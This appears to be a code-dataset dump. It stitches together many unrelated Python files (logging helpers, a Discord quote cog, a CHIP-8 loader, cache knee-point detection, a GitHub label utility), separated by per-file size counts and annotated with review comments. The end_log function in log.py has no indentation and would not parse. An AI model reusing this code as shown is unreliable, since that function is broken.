    Accepts either a single pair of arrays or two parallel lists of arrays;
    for lists, the per-pair differences are averaged.
    """
    def _single_pair(a, b):
        # sqrt of the squared difference == absolute difference of variances
        return math.sqrt((a.var() - b.var()) ** 2)

    if not isinstance(image_1, list):
        return _single_pair(image_1, image_2)
    total = 0
    for idx, img in enumerate(image_1):
        total += _single_pair(img, image_2[idx])
    return total / len(image_1)
def mean_squared_error(image_1, image_2):
    """Mean squared error between two images (averaged over parallel lists)."""
    def _pair_mse(a, b):
        return ((a - b) ** 2).mean(axis=None)

    if not isinstance(image_1, list):
        return _pair_mse(image_1, image_2)
    total = 0
    for idx, img in enumerate(image_1):
        total += _pair_mse(img, image_2[idx])
    return total / len(image_1)
def gabor_filter(image, frequency, theta):
    """Real part of a Gabor filter response; maps over a list of images if given one.

    NOTE(review): skimage.filters.gabor_filter was renamed `gabor` in newer
    scikit-image releases — confirm the pinned version still exposes this name.
    """
    if isinstance(image, list):
        return [skimage.filters.gabor_filter(img, frequency, theta)[0]
                for img in image]
    return skimage.filters.gabor_filter(image, frequency, theta)[0]
| 1,094 | 408 |
"""
log.py
Author: Michael Pagliaro
Utility functions specific to writing log files.
"""
from datetime import datetime
import sys
import traceback
import os
import util
# The log file to be written to whenever log() is called
LOG_FILE = None
LOGS_DIRECTORY = "logs"
def logger(func):
    """
    Creates a decorator function that when applied to a function, enables logging during the runtime
    of that function. When the function ends, the logfile is closed.
    :param func: The function to decorate.
    :return: A decorator function that wraps another function, controlling logging before and after it runs.
    """
    from functools import wraps

    @wraps(func)  # preserve the wrapped function's name and docstring
    def wrapper_logger(*args, **kwargs):
        begin_log()
        try:
            return func(*args, **kwargs)
        finally:
            # Bug fix: previously end_log() was skipped when func raised,
            # leaving the log file open; always close it.
            end_log()
    return wrapper_logger
def begin_log():
    """
    Open the log file to prepare for it to be written to. This will also write the first line
    of the log file. This should be called before using log() or end_log().
    """
    global LOG_FILE
    # Create the logs directory on first use (exist_ok guards a race with the
    # preceding exists() check).
    if not os.path.exists(os.path.join(util.working_directory(), LOGS_DIRECTORY)):
        os.makedirs(os.path.join(util.working_directory(), LOGS_DIRECTORY), exist_ok=True)
    # One timestamped file per backup run.
    current_time = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
    file_name = "log_backup_" + current_time + ".txt"
    file_path = os.path.join(util.working_directory(), LOGS_DIRECTORY, file_name)
    LOG_FILE = open(file_path, "w")
    LOG_FILE.write("Beginning backup log: " + datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "\n")
def end_log():
"""
Close the log file after writing an ending message to the file. This should only be called
after begin_log(). To write more log messages after this is called, begin_log() must be
called again, which will start a new file.
"""
global LOG_FILE
LOG_FILE.write("Ending backup log: " + datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "\n")
LOG_FILE.close()
def log(log_str=""):
    """
    Logging function, this will take in any given string and write it to a log file in
    the running directory. This will automatically print a newline in the log file after
    every time this function is called. The begin_log() function must be called before this
    can be used.
    :param log_str: The string to append to the log file.
    """
    global LOG_FILE
    # Bug fix: the old code wrote str(log_str.encode('utf8')), which put the
    # bytes repr (e.g. "b'text'") into the file.  Escape non-ASCII characters
    # instead so the write never raises regardless of the file's encoding.
    LOG_FILE.write(log_str.encode("ascii", errors="backslashreplace").decode("ascii") + "\n")
def log_print(log_str=""):
    """
    Logging function, this takes any string and writes it to the current log file as well as prints it
    to standard output. This automatically puts a newline after the string in the file and in the console
    output. The log file must be opened before using this function.
    :param log_str: The string to append to the log file and echo to stdout.
    """
    global LOG_FILE
    # Bug fix: was str(log_str.encode('utf8')), which wrote the bytes repr
    # ("b'text'") into the log; escape non-ASCII instead (see log()).
    LOG_FILE.write(log_str.encode("ascii", errors="backslashreplace").decode("ascii") + "\n")
    print(log_str)
def log_exception(error_file_path, action="ACCESSING"):
    """
    Writes the most recent exception to the log file. This includes the full traceback.
    :param error_file_path: The file or folder that caused the error.
    :param action: What was happening to that file to cause the error, such as "creating" or "deleting".
    """
    log("\n" + '=' * 60 + "\nERROR {} {}".format(action, error_file_path))
    exc_type, exc_value, exc_traceback = sys.exc_info()
    exception_list = traceback.format_exception(exc_type, exc_value, exc_traceback)
    # Join once instead of concatenating in a loop (avoids quadratic copies).
    full_error_str = "".join(exception_list)
    log(full_error_str + '=' * 60 + "\n")
#! python3
def comma_string(_list):
    """Takes a list of items and formats it into a string, separated by
    commas like plain English (with an Oxford comma before "and").

    Args:
        _list: The list of items.
    Returns:
        result: The items joined English-style, e.g. "a, b, and c".
                An empty list gives "", and a single item is returned as-is
                (previously a lone item came back as "and item").
    """
    items = [str(item) for item in _list]
    if not items:
        return ""
    if len(items) == 1:
        return items[0]
    # Matches the original output for two or more items, e.g. "a, and b".
    return ", ".join(items[:-1]) + ", and " + items[-1]
# Demo: print the Rocinante's crew as an English list.
crew = ["Holden", "Nagata", "Kamal", "Burton", "Miller"]
print(comma_string(crew))
| 589 | 191 |
def CarMotor(car_type):
    """Factory: return the motor driver instance matching `car_type`.

    Imports are deferred into each branch so that only the selected platform's
    hardware dependencies are loaded.

    :param car_type: one of 'hjduino', 'xiaor' or 'picar'
    :raises ValueError: for an unrecognised car_type (the original silently
        returned None, which surfaced later as an AttributeError at the caller)
    """
    if car_type == 'hjduino':
        from motor.car_specific_motor.hjduino.car_motor_hjduino_jetson import CarMotorHJduino
        return CarMotorHJduino()
    if car_type == 'xiaor':
        from motor.car_specific_motor.xiaor.car_motor_xiaor_jetson import CarMotorXiaoR
        return CarMotorXiaoR()
    if car_type == 'picar':
        from motor.car_specific_motor.picar.car_motor_picar import CarMotorPicar
        return CarMotorPicar()
    raise ValueError("unknown car_type: %r" % (car_type,))
import sae
def app(environ, start_response):
    """Minimal WSGI application for the SAE platform."""
    status = '200 OK'
    response_headers = [('Content-type', 'text/plain')]
    start_response(status, response_headers)
    # NOTE(review): this returns the repr of the start_response callable as the
    # response body — looks like leftover debugging; also, WSGI on Python 3
    # expects an iterable of *bytes*, not str.  Confirm intended behavior.
    return [str(start_response)]
# SAE entry point: wrap the raw WSGI callable for the platform runtime.
application = sae.create_wsgi_app(app)
| 243 | 83 |
#!/usr/bin/env python3
def largest_subsequence(s1, s2):
    """Return the longest common subsequence (LCS) of s1 and s2.

    Classic O(len(s1) * len(s2)) dynamic programming: dp[i][j] holds the LCS
    length of s1[:i] and s2[:j]; the subsequence itself is recovered by
    walking the table back from the bottom-right corner.  (The original
    function was an unimplemented `pass` stub that returned None.)
    """
    m, n = len(s1), len(s2)
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            if s1[i - 1] == s2[j - 1]:
                dp[i][j] = dp[i - 1][j - 1] + 1
            else:
                dp[i][j] = max(dp[i - 1][j], dp[i][j - 1])
    # Backtrack to recover one LCS (preferring moves up the s1 axis on ties).
    chars = []
    i, j = m, n
    while i > 0 and j > 0:
        if s1[i - 1] == s2[j - 1]:
            chars.append(s1[i - 1])
            i -= 1
            j -= 1
        elif dp[i - 1][j] >= dp[i][j - 1]:
            i -= 1
        else:
            j -= 1
    return ''.join(reversed(chars))

print(largest_subsequence("ABAZDC", "BACBAD")) # "ABAD"
print(largest_subsequence("AGGTAB", "GXTXAYB")) # "GTAB"
print(largest_subsequence("aaaa", "aa")) # "aa"
print(largest_subsequence("", "...")) # ""
print(largest_subsequence("ABBA", "ABCABA")) # "ABBA"
| 331 | 139 |
from django.core.management.base import BaseCommand, CommandError
from study_management.models import Datapoint
from cryptography.fernet import Fernet
import base64
class Command(BaseCommand):
    """Management command that prints a freshly generated Fernet key."""
    help = 'Generates a new Fernet key'
    def handle(self, *args, **options):
        # Fernet.generate_key() returns url-safe base64-encoded *bytes*.
        key = Fernet.generate_key()
        # NOTE(review): bytes are passed to stdout.write here; Django's
        # OutputWrapper normally expects str — confirm the printed form.
        self.stdout.write(self.style.SUCCESS(key))
"""Client to create or update odin user"""
import argparse
import os
import json
import signal
import requests
from prompt_toolkit import prompt
from muninn import ODIN_URL, ODIN_PORT, ODIN_SCHEME, ODIN_API_LOGGER
from muninn.auth import get_jwt_token
def create_user_http(url: str, jwt_token: str, username: str, password: str, firstname: str, lastname: str) -> None:
    """Create or update a user over HTTP

    Flow: GET the user; if missing, POST a new one and return; if present,
    fall through to a PUT update after the try block.

    :param url: the base URL
    :param jwt_token: The JWT token representing this authentication
    :param username: The user ID
    :param password: The updated password
    :param firstname: The firstname
    :param lastname: The lastname
    """
    user = {"username": username, "password": password}
    if firstname:
        user['firstname'] = firstname
    if lastname:
        user['lastname'] = lastname
    headers = {'Authorization': f'Bearer {jwt_token}'}
    try:
        # NOTE(review): this existence probe sends no Authorization header —
        # confirm the endpoint allows unauthenticated GETs.
        response = requests.get(f'{url}/v1/users/{username}')
        if response.status_code == 401:
            # Propagated to the caller so it can refresh the token and retry.
            raise ValueError("Invalid login")
        if response.status_code != 200:
            # No such user exists so do a POST
            response = requests.post(f'{url}/v1/users', headers=headers, json={"user": user})
            if response.status_code != 200:
                raise Exception(f"Failed to create user: {username}")
            results = response.json()
            ODIN_API_LOGGER.info("Created new user")
            ODIN_API_LOGGER.info(json.dumps(results))
            return
        results = response.json()
        ODIN_API_LOGGER.info("Found existing user")
        ODIN_API_LOGGER.info(json.dumps(results))
    except Exception as ex:
        # Best-effort: log and bail out without updating.
        ODIN_API_LOGGER.error(ex)
        return
    # Existing user: update in place.
    response = requests.put(f'{url}/v1/users/{username}', json=user, headers=headers)
    results = response.json()
    ODIN_API_LOGGER.info(json.dumps(results))
def main():
    """Create a new user or update an existing one.
    This requires a valid JWT token which you can get with `odin-auth`, or if it doesnt exist, it will prompt you
    for these
    """
    # Exit quietly on Ctrl-C instead of dumping a traceback.
    signal.signal(signal.SIGINT, lambda *args, **kwargs: exit(0))
    parser = argparse.ArgumentParser(description='Create or update an odin user')
    parser.add_argument('--host', default=ODIN_URL, type=str)
    parser.add_argument('--port', default=ODIN_PORT)
    parser.add_argument('--token', help="File where JWT token can reside", default=os.path.expanduser("~/.odin.token"))
    parser.add_argument('--username', '-u', help="Create or update a username")
    parser.add_argument('--password', '-p', help="New or updated password")
    parser.add_argument('--firstname', '-f', help="First name")
    parser.add_argument('--lastname', '-l', help="Last name")
    parser.add_argument('--scheme', choices={'http', 'https'}, default=ODIN_SCHEME, help='The protocol to communicate over')
    args = parser.parse_args()
    # Prompt interactively for anything not given on the command line.
    if not args.username:
        args.username = prompt('create username: ', is_password=False)
    if not args.password:
        args.password = prompt('new password: ', is_password=True)
    url = f'{args.scheme}://{args.host}:{args.port}'
    jwt_token = get_jwt_token(url, args.token, None, None)
    try:
        create_user_http(url, jwt_token, args.username, args.password, args.firstname, args.lastname)
    except ValueError:
        # Try deleting the token file and start again
        if os.path.exists(args.token):
            os.remove(args.token)
        jwt_token = get_jwt_token(url, args.token, None, None)
        create_user_http(url, jwt_token, args.username, args.password, args.firstname, args.lastname)

if __name__ == '__main__':
    main()
| 3,680 | 1,140 |
<error descr="Unresolved reference 'np'">n<caret>p</error>.ndarray
| 67 | 26 |
from DataBase import Schedule
# English -> Russian weekday names (for rendering schedule output).
weekdays_en = {'Monday': 'Понедельник',
               'Tuesday': 'Вторник',
               'Wednesday': 'Среда',
               'Thursday': 'Четверг',
               'Friday': 'Пятница',
               'Saturday': 'Суббота',
               'Sunday': 'Воскресенье'}
# Russian -> English, the exact inverse of weekdays_en.
weekdays_ru = {'Понедельник': 'Monday',
               'Вторник': 'Tuesday',
               'Среда': 'Wednesday',
               'Четверг': 'Thursday',
               'Пятница': 'Friday',
               'Суббота': 'Saturday',
               'Воскресенье': 'Sunday'}
| 564 | 200 |
#!/usr/bin/env python3
"""
Print the classic "Hello, World!" greeting.
"""
print("Hello, World!")
| 70 | 31 |
# Generated by Django 2.0 on 2017-12-21 06:21
import app.models
from django.db import migrations
import enumfields.fields
# Auto-generated Django migration — avoid hand-editing the operations.
class Migration(migrations.Migration):
    """Switch player.role to a nullable EnumField over app.models.Role."""
    dependencies = [
        ('app', '0003_player_token'),
    ]
    operations = [
        migrations.AlterField(
            model_name='player',
            name='role',
            field=enumfields.fields.EnumField(enum=app.models.Role, max_length=12, null=True),
        ),
    ]
| 451 | 152 |
def wrap(element, input):
    """Return `input` wrapped in an XML element named `element`, newline-terminated."""
    return "<{0}>{1}</{0}>\n".format(element, input)
def process(tr, parameters, tableBuilder):
    """Append a timestamped user note to the Q_NOTES XML property of an
    openBIS sample or experiment (Jython dropbox/ingestion-service entry point).

    NOTE(review): `id`, `time` and `all` shadow Python builtins — left as-is
    to keep this a documentation-only change.
    """
    id = parameters.get("id")
    # A 3-part identifier (/SPACE/PROJECT/CODE) denotes a sample; anything
    # else is treated as an experiment identifier.
    idtype = len(id.split("/"))
    #sample
    if(idtype == 3):
        entity = tr.getSampleForUpdate(id)
    #experiment
    else:
        entity = tr.getExperimentForUpdate(id)
    user = parameters.get("user")
    comment = parameters.get("comment")
    time = str(parameters.get("time"))
    xml = entity.getPropertyValue("Q_NOTES")
    # Copy the existing XML minus the closing </notes> tag so the new note
    # can be appended before re-closing the document.
    all = ""
    try:
        for line in xml.split("\n"):
            if not "</notes>" in line:
                all += line
    except:
        # No existing notes (xml is None): start a fresh document.
        all = "<notes>"
    note = "\n<note>\n"
    note += wrap("comment",comment)+wrap("time",time)+wrap("username",user)
    note += "</note>\n"
    all += note
    all += "</notes>"
    entity.setPropertyValue("Q_NOTES",all)
from core.cpu.instructions import Cpu
from core.cpu.config.memory_starter import MemoryStarter
from core.cpu.config.memory_config import Config
from core.reader.file_reader import FileReader
class Main:
    """Wires the CHIP-8 CPU to memory and runs a single fetch cycle."""

    def __init__(self):
        self.chip8_cpu = Cpu()
        self.memory_management = MemoryStarter(self.chip8_cpu)

    def run(self):
        """Load the ROM and font set into memory, then execute one cycle."""
        rom = FileReader.file_reader()
        rom_bytes = FileReader.load_binary_to_buffer(rom)
        self.memory_management.load_into_memory(rom_bytes, Config.MEMORY_START_ADDRESS)
        self.memory_management.load_into_memory(Config.FONT_SET, Config.FONT_SET_START_ADDRESS)
        self.cycle()

    def cycle(self):
        """Fetch one 16-bit big-endian opcode at PC and advance PC by two."""
        pc = self.chip8_cpu.pc
        high = self.chip8_cpu.memory[pc]
        low = self.chip8_cpu.memory[pc + 1]
        self.chip8_cpu.current_opcode = (high << 8) | low
        self.chip8_cpu.pc += 2
        print(hex(self.chip8_cpu.current_opcode))
| 994 | 329 |
# !/usr/bin/python
"""
Copyright ©️: 2020 Seniatical / _-*™#7519
License: Apache 2.0
A permissive license whose main conditions require preservation of copyright and license notices.
Contributors provide an express grant of patent rights.
Licensed works, modifications, and larger works may be distributed under different terms and without source code.
FULL LICENSE CAN BE FOUND AT:
https://www.apache.org/licenses/LICENSE-2.0.html
Any violation to the license, will result in moderate action
You are legally required to mention (original author, license, source and any changes made)
"""
import discord
from discord.ext import commands
from datetime import timedelta
from discord.ext.commands import BucketType, cooldown
from discord import File
import random
import os
from utility.quotes import words, images
class Motivation(commands.Cog):
    """Cog serving motivational quotes, quote images and speech audio files."""

    def __init__(self, bot):
        self.bot = bot
        self.speech_paths = []
        base = './storage/speeches'
        for entry in os.listdir(base):
            entry_path = os.path.join(base, entry)
            # Bug fix: the original called os.path.isdir(entry) relative to the
            # CWD (effectively always False), concatenated directory and file
            # names without a separator ('dir' + 'file'), and used the wrong
            # root './speeches/' — so stored paths never existed on disk and
            # discord.File() failed when sending a speech.
            if os.path.isdir(entry_path):
                for nested in os.listdir(entry_path):
                    self.speech_paths.append(os.path.join(entry_path, nested))
            else:
                self.speech_paths.append(entry_path)

    @commands.command(aliases=['Quotes'])
    @cooldown(1, 10, BucketType.user)
    async def quote(self, ctx):
        """Send a random motivational quote as an embed."""
        return await ctx.send(embed=discord.Embed(
            description=random.choice(words),
            colour=discord.Colour.gold()
        ))

    @commands.command(aliases=['VQ', 'ImgQ', 'IQuote'])
    @cooldown(1, 15, BucketType.user)
    async def imagequote(self, ctx):
        """Send a random motivational image as an embed."""
        return await ctx.send(embed=discord.Embed(
            colour=discord.Colour.gold(),
        ).set_image(url=random.choice(images)))

    @commands.command(aliases=['Speeches'])
    @cooldown(1, 120, BucketType.user)
    async def speech(self, ctx):
        """Upload a random motivational speech as an mp3 attachment."""
        return await ctx.send(content='Enjoy this speech to listen to!',
                              file=discord.File(random.choice(self.speech_paths), filename='speech.mp3'))
def setup(bot):
    # discord.py extension entry point: register the cog when the bot loads it.
    bot.add_cog(Motivation(bot))
| 2,179 | 718 |
import pandas as pd
from nltk.stem import LancasterStemmer, WordNetLemmatizer
from nltk.tokenize import sent_tokenize, word_tokenize
from curami.commons import file_utils
'''
Match pair of attributes for their base form similarity
Generates matched attribute file by measuring the syntactic similarity between the base form of the two attributes.
Outputs two attributes and similarity score
'''
# NOTE(review): declared threshold, but the code below hard-codes ratios of
# 1 (lemma match) and 0.8 (stem match) — confirm which value is intended.
match_ratio = 0.85
def analyze():
    """Score attribute pairs by base-form equality: 1.0 when their lemmatized
    forms match, 0.8 when only their stemmed forms match; write the sorted
    result to the word-base matched attribute csv."""
    attributes = pd.read_csv(file_utils.matched_attributes_file, encoding=file_utils.encoding)
    stemmer = LancasterStemmer()
    lemmatizer = WordNetLemmatizer()
    matched_attributes = []
    for index, row in attributes.iterrows():
        # lemmatize
        attribute1 = ' '.join(lemmatizer.lemmatize(w) for w in row["ATTRIBUTE_1"].split())
        attribute2 = ' '.join(lemmatizer.lemmatize(w) for w in row["ATTRIBUTE_2"].split())
        if attribute1 == attribute2:
            matched_attributes.append({"ATTRIBUTE_1": row["ATTRIBUTE_1"],
                                       "ATTRIBUTE_2": row["ATTRIBUTE_2"],
                                       "RATIO": 1})
            continue
        # stem
        attribute1 = ' '.join(stemmer.stem(w) for w in row["ATTRIBUTE_1"].split())
        attribute2 = ' '.join(stemmer.stem(w) for w in row["ATTRIBUTE_2"].split())
        if attribute1 == attribute2:
            matched_attributes.append({"ATTRIBUTE_1": row["ATTRIBUTE_1"],
                                       "ATTRIBUTE_2": row["ATTRIBUTE_2"],
                                       "RATIO": 0.8})
    pd_matched_attributes = pd.DataFrame(matched_attributes)
    # NOTE(review): if no pair matches, the frame is empty and this
    # sort_values on "RATIO" raises KeyError — confirm inputs always match.
    pd_matched_attributes = pd_matched_attributes.sort_values(by="RATIO", ascending=False)
    pd_matched_attributes.to_csv(
        file_utils.word_base_matched_attribute_file, index=False, encoding=file_utils.encoding)

if __name__ == "__main__":
    analyze()
| 1,882 | 596 |
# coding: utf-8
__author__ = 'Tyler Estro'
__version__ = '0.1'
__email__ = 'testro@cs.stonybrook.edu'
__status__ = 'Development'
import numpy as np
import logging
import uts.gradient as grad
from uts.zscore import zscore_array
logger = logging.getLogger(__name__)
def map_index(a:np.ndarray, b:np.ndarray) -> np.ndarray:
    """
    Maps the knee points into indexes.

    Every value in ``b`` must occur in ``a``; the returned array holds, for
    each knee x-value, its position in the (unsorted) input array.

    Args:
        a (np.ndarray): numpy array with the points (x)
        b (np.ndarray): numpy array with the knee points points (x)

    Returns:
        np.ndarray: The knee indexes
    """
    order = np.argsort(a)
    # Binary-search the sorted view, then translate back to original positions.
    positions = np.searchsorted(a, b, sorter=order)
    return order[positions]
def knees(points:np.ndarray, dx:float=0.05, dy:float=0.05, dz:float=0.05, x_max:int=None, y_range:list=None) -> np.ndarray:
    """
    Given an array of points, it computes the knees.

    Args:
        points (np.ndarray): numpy array with the points (x, y)
        dx (float): % of max cache size between points (default 0.05)
        dy (float): % of max - min miss ratio between points (default 0.05)
        dz (float): amount we decrease outlier_z every iteration (default 0.05)
        x_max (int): max cache size of original (pre-RDP) MRC (default None)
        y_range (list): [max, min] miss ratio of original (pre-RDP) MRC (default None)

    Returns:
        np.ndarray: The knee indexes into `points`
    """
    knee_xs = np.array(getPoints(points, dx, dy, dz, False, x_max, y_range))
    # Translate the knee x-coordinates back into indexes of the input array.
    return map_index(points[:, 0], knee_xs)
def getPoints(points: np.ndarray, dx:float=0.05, dy:float=0.05, dz:float=0.05, plot:bool=False, x_max:int=None, y_range:list=None) -> np.ndarray:
    """
    Use our outlier method to find interesting points in an MRC.

    Repeatedly selects points whose second-derivative z-score exceeds a
    threshold (starting at 3 and relaxed by ``dz`` per pass), enforcing a
    minimum spacing of ``dx``*x_max on x and ``dy``*(y_max-y_min) on y
    between selections.

    Args:
        points (np.ndarray): numpy array with the points (x, y)
        dx (float): % of max cache size between points (default 0.05)
        dy (float): % of max - min miss ratio between points (default 0.05)
        dz (float): amount we decrease outlier_z every iteration (default 0.05)
        plot (bool): set True if you want to return data useful for plotting
        x_max (int): max cache size of original (pre-RDP) MRC (default None)
        y_range (list): [max, min] miss ratio of original (pre-RDP) MRC (default None)

    Returns:
        list: sorted knee x coordinates; when ``plot`` is True, instead a
        tuple of ({x: miss_ratio} dict, z-scores of the 2nd derivative)
    """
    # in case we use RDP, we need the original MRC x/y ranges: x_max,y_range vars
    x_max = x_max if x_max else len(points)
    if y_range:
        y_max,y_min = y_range
    else:
        y_max,y_min = (points[:,1].max(),points[:,1].min())
    # degenerate inputs: too few points, or a curve whose best miss ratio is 1
    if len(points) < 4:
        logger.debug('pointSelector: < 4 unique requests in workload')
        return []
    if y_min == 1:
        logger.debug('pointSelector: workload completely random (dont bother caching)')
        return []
    # get absolute x and y distances (minimum spacing between selections)
    x_width = max(1, int(x_max * dx))
    y_height = (y_max - y_min) * dy
    # get z-score of the curve's second derivative
    x = points[:, 0]
    y = points[:, 1]
    yd2 = grad.csd(x, y)
    z_yd2 = zscore_array(x, yd2)
    min_zscore = min(z_yd2)
    # stack the 2nd derivative zscore with the points -> columns (x, y, z)
    points = np.column_stack((points, z_yd2))
    # outlier_points holds our final selected points
    outlier_points = np.empty((0,2))
    # main loop. start with outliers >= 3 z-score, relaxing by dz each pass
    outlier_z = 3
    while True:
        points_added = 0
        # candidate points have a zscore >= outlier_z
        candidates = points[points[:,2] >= outlier_z]
        #print('Candidates: ' + str(len(candidates)) + ' Points: ' + str(len(points)) + ' Outlier_Points: ' +
        #    str(len(outlier_points)) + ' Outlier_Z: ' + str(round(outlier_z,3)))
        if len(candidates) > 0:
            # positions where consecutive candidates are >= x_width apart on x
            x_diff = np.argwhere(np.diff(candidates, axis=0)[:,0] >= x_width).flatten()
            if len(x_diff) == 0:
                # all candidates fall within a single x window: keep one
                outlier_best = candidates[np.argmin(candidates[:,1])] # best miss ratio in range
                # only accept it if it is y_height away from every prior pick
                if all(abs(outlier_best[1]-i) >= y_height for i in outlier_points[:,1]):
                    outlier_points = np.append(outlier_points, [[outlier_best[0], outlier_best[1]]], axis=0)
                    # drop every remaining point inside the exclusion window
                    points = points[np.where(((points[:,0] <= (outlier_best[0] - x_width)) | (points[:,0] >= (outlier_best[0] + x_width))) & \
                        ((points[:,1] <= (outlier_best[1] - y_height)) | (points[:,1] >= (outlier_best[1] + y_height))))]
                    points_added += 1
            else:
                candidate_outliers = np.empty((0,3))
                x_diff = np.hstack(([0],x_diff,[len(candidates)-1]))
                # first create an array of candidate outliers, one per x window
                for i in range(0, len(x_diff)-1):
                    # points in this form (0, 1) [1,2) ... [n,End)
                    if i == 0:
                        x_range = candidates[candidates[:,0] <= candidates[x_diff[i+1]][0]]
                    else:
                        x_range = candidates[(candidates[:,0] > candidates[x_diff[i]][0]) & (candidates[:,0] <= candidates[x_diff[i+1]][0])]
                    outlier_best = x_range[np.argmin(x_range[:,1])] # point with best miss ratio in range
                    outlier_best_z = x_range[np.argmin(x_range[:,2])][2] # z-score kept for ranking (lowest in range)
                    outlier_best[2] = outlier_best_z
                    candidate_outliers = np.append(candidate_outliers, [outlier_best], axis=0)
                # sort all the candidate outliers by z-score in descending order
                candidate_outliers = candidate_outliers[np.argsort(candidate_outliers[:,2])][::-1]
                for outlier_best in candidate_outliers:
                    # same y-distance acceptance test and exclusion-window prune
                    if all(abs(outlier_best[1]-i) >= y_height for i in outlier_points[:,1]):
                        outlier_points = np.append(outlier_points, [[outlier_best[0], outlier_best[1]]], axis=0)
                        points = points[np.where(((points[:,0] <= (outlier_best[0] - x_width)) | (points[:,0] >= (outlier_best[0] + x_width))) & \
                            ((points[:,1] <= (outlier_best[1] - y_height)) | (points[:,1] >= (outlier_best[1] + y_height))))]
                        points_added += 1
        # terminating conditions (i think len(points) == 0 is all we need now)
        if len(points) == 0 or ((outlier_z <= min_zscore) and points_added == 0):
            break
        outlier_z -= dz
    # sweep left-to-right and drop any pick whose miss ratio is worse than a
    # pick already kept at a smaller x (avoids concavity artifacts)
    outlier_min_mr = 1.0
    # convert to a dict so we can delete in-place
    outlier_points = {int(x[0]):x[1] for x in outlier_points}
    outlier_keys = list(sorted(outlier_points.keys()))
    for k in outlier_keys:
        if outlier_points[k] > outlier_min_mr:
            del outlier_points[k]
        else:
            outlier_min_mr = outlier_points[k]
    # returns sorted list of cache sizes
    if not plot:
        #return map_index(points, outlier_points)
        return np.array(list(sorted(outlier_points.keys())))
    else:
        return (outlier_points, z_yd2)
| 7,154 | 2,432 |
from config import settings
import re
class LogoFinderService():
    """Scrapes a parsed web page for the site's logo image."""

    def __init__(self,soup_obj,website_url):
        # Parsed document (BeautifulSoup-style) and the URL it came from.
        self.soup_obj = soup_obj
        self.website_url = website_url
        self.scrapping_settings = settings['ScrappingSettings']

    def find_logo(self) -> str:
        '''Return the full path of the scrapped logo as a string, or the
        marker "NO LOGO FOUND" / "AMBIGUOUS LOGO: ..." when zero or several
        candidates match.'''
        identifier = self.scrapping_settings['LogoTextIdentifier']
        logos = []
        for image in self.soup_obj.find_all('img'):
            image_address = image.get('src')
            if image_address is None:
                # Bug fix: images without a src used to be appended as None
                # when a class matched, crashing the regex check below.
                continue
            matches = identifier in image_address.lower()
            if not matches and 'class' in image.attrs:
                matches = any(identifier in classname.lower()
                              for classname in image.attrs['class'])
            if matches:
                # Append each image at most once. Previously an image matching
                # on both src and class was counted twice, which falsely
                # flagged the result as ambiguous.
                logos.append(image_address)
        if len(logos) == 0:
            return "NO LOGO FOUND"
        logo = logos[0]
        regex_item = self.scrapping_settings['AbsoluteVsRelativeRegexChecker']
        if len(re.findall(regex_item, logo)) == 0:
            # Relative URL: prefix the site address to build a full path.
            logo = self.website_url+logo
        if len(logos) > 1:
            print(f'More than one logo found for:{self.website_url}. The first one was chosen arbitrary.')
            logo = f"AMBIGUOUS LOGO: {logo}"
        return logo
from .schedule import schedule
| 31 | 8 |
import github
def IssueRepo(issue):
    """Return the 'owner/name' slug of the repository an issue belongs to."""
    # API URLs look like .../repos/<owner>/<name>/issues/<number>, so the
    # owner and name are the 4th- and 3rd-from-last path segments.
    segments = issue.url.split('/')
    return '/'.join(segments[-4:-2])
def HasLabel(issue, name):
    """Return True when ``issue`` already carries a label called ``name``."""
    return any(label.name == name for label in issue.get_labels())
def AddLabel(gh, issue, name, create=True):
    """Attach the label ``name`` to ``issue``.

    Looks the label up (creating it when ``create`` is True); when the label
    is unavailable, leaves an explanatory comment on the issue instead.
    """
    if HasLabel(issue, name):
        # Nothing to do -- the label is already attached.
        return
    label = gh.get_label(IssueRepo(issue), name, create=create)
    if label is not None:
        issue.add_to_labels(label)
        return
    issue.create_comment(
        'Sorry! "{}" is not a label yet, and I don\'t create '.format(name)
        + 'labels to avoid spam.'
    )
def ObjectType(o):
    """Classify a PyGithub object as 'issue', 'repository', or None."""
    type_map = (
        (github.Issue.Issue, 'issue'),
        (github.Repository.Repository, 'repository'),
    )
    for cls, kind in type_map:
        if isinstance(o, cls):
            return kind
    return None
| 796 | 257 |
import sys
def addBinary(a, b):
    """Add two binary numbers written with the decimal digits 0 and 1.

    Args:
        a: int whose decimal digits are binary digits, e.g. 101 means 0b101.
        b: int in the same format.

    Returns:
        str: the binary sum, e.g. addBinary(101, 11) -> '1000'.

    Raises:
        ValueError: if either argument contains a digit other than 0 or 1
            (the old hand-rolled carry loop silently produced garbage here).
    """
    # The original body was a dead-code docstring plus a manual digit-by-digit
    # carry propagation; reinterpreting the digit strings in base 2 and
    # formatting the sum with bin() is equivalent for all valid inputs.
    return bin(int(str(a), 2) + int(str(b), 2))[2:]
# CLI entry point: expects two binary numbers (digits 0/1) as arguments.
if __name__ == '__main__':
    print(addBinary(int(sys.argv[1]), int(sys.argv[2])))
| 915 | 324 |
import numpy as np
import scipy as sp
from scipy import stats as sps
import scipy.optimize as op
import qp
class composite(object):
    def __init__(self, components, vb=True):
        """
        A probability distribution that is a linear combination of scipy.stats.rv_continuous objects

        Parameters
        ----------
        components: list or tuple, dicts
            aggregation of dicts defining component functions and their
            coefficients; each dict holds a frozen distribution under
            'function' and a weight under 'coefficient'
        vb: boolean
            report on progress to stdout?

        Notes
        -----
        TO DO: change x --> z
        """
        self.components = components
        self.n_components = len(self.components)
        self.component_range = range(self.n_components)
        # normalize the weights so the mixture integrates to 1
        coefficients = np.array([component['coefficient'] for component in self.components])
        self.coefficients = coefficients / np.sum(coefficients)
        self.functions = np.array([component['function'] for component in self.components])

    def pdf(self, xs):
        """
        Evaluates the composite PDF at locations

        Parameters
        ----------
        xs: float or numpy.ndarray, float
            value(s) at which to evaluate the PDF

        Returns
        -------
        ps: float or numpy.ndarray, float
            value(s) of the PDF at xs
        """
        # weighted sum of the component densities
        ps = np.zeros(np.shape(xs))
        for c in self.component_range:
            ps += self.coefficients[c] * self.functions[c].pdf(xs)
        return ps

    def cdf(self, xs):
        """
        Evaluates the composite CDF at locations

        Parameters
        ----------
        xs: float or numpy.ndarray, float
            value(s) at which to evaluate the CDF

        Returns
        -------
        ps: float or numpy.ndarray, float
            value(s) of the CDF at xs
        """
        # weighted sum of the component CDFs
        ps = np.zeros(np.shape(xs))
        for c in self.component_range:
            ps += self.coefficients[c] * self.functions[c].cdf(xs)
        return ps

